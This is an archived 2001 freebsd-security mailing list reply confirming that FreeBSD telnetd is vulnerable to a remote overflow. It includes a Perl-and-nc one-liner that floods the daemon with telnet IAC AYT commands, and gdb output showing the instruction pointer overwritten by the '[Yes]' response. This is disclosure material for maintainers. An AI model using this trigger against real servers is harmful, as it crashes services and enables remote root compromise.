From owner-freebsd-security  Thu Jul 19  2: 7:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost.freebsd.lublin.pl (mailhost.freebsd.lublin.pl [212.182.115.12])
	by hub.freebsd.org (Postfix) with ESMTP id E61D637B403
	for <security@freebsd.org>; Thu, 19 Jul 2001 02:07:15 -0700 (PDT)
	(envelope-from venglin@freebsd.lublin.pl)
Received: from clitoris (root@mailhost.freebsd.lublin.pl [212.182.115.12])
	by mailhost.freebsd.lublin.pl (8.11.4/8.11.4) with SMTP id f6J95om09102;
	Thu, 19 Jul 2001 11:05:50 +0200 (CEST)
	(envelope-from venglin@freebsd.lublin.pl)
Message-ID: <014d01c11031$bdab5a10$2001a8c0@clitoris>
From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To: "Mike Tancsa" <mike@sentex.net>
Cc: <security@freebsd.org>
References: <5.1.0.14.0.20010719001357.03e22638@192.168.0.12>
Subject: Re: FreeBSD remote root exploit ?
Date: Thu, 19 Jul 2001 11:03:53 +0200
Organization: babcia padlina ltd.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> Posted to bugtraq is a notice about telnetd being remotely root
> exploitable. Does anyone know if it is true ?

Yes, telnetd is vulnerable.

lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c
x0 . "\r\n"' | nc localhost 23

(gdb) att 9024
Attaching to process 9024
0x28230f90 in ?? ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x5d736559 in ?? ()
(gdb) bt
#0  0x5d736559 in ?? ()
#1  0x804e9d9 in ?? ()
#2  0x804d1a1 in ?? ()
#3  0x804d6d1 in ?? ()
#4  0x804d14d in ?? ()
#5  0x8049bd3 in ?? ()


The strange %eip value is:

riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
Yes]

"\r\n[Yes]\r\n" is response for IAC AYT command string.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message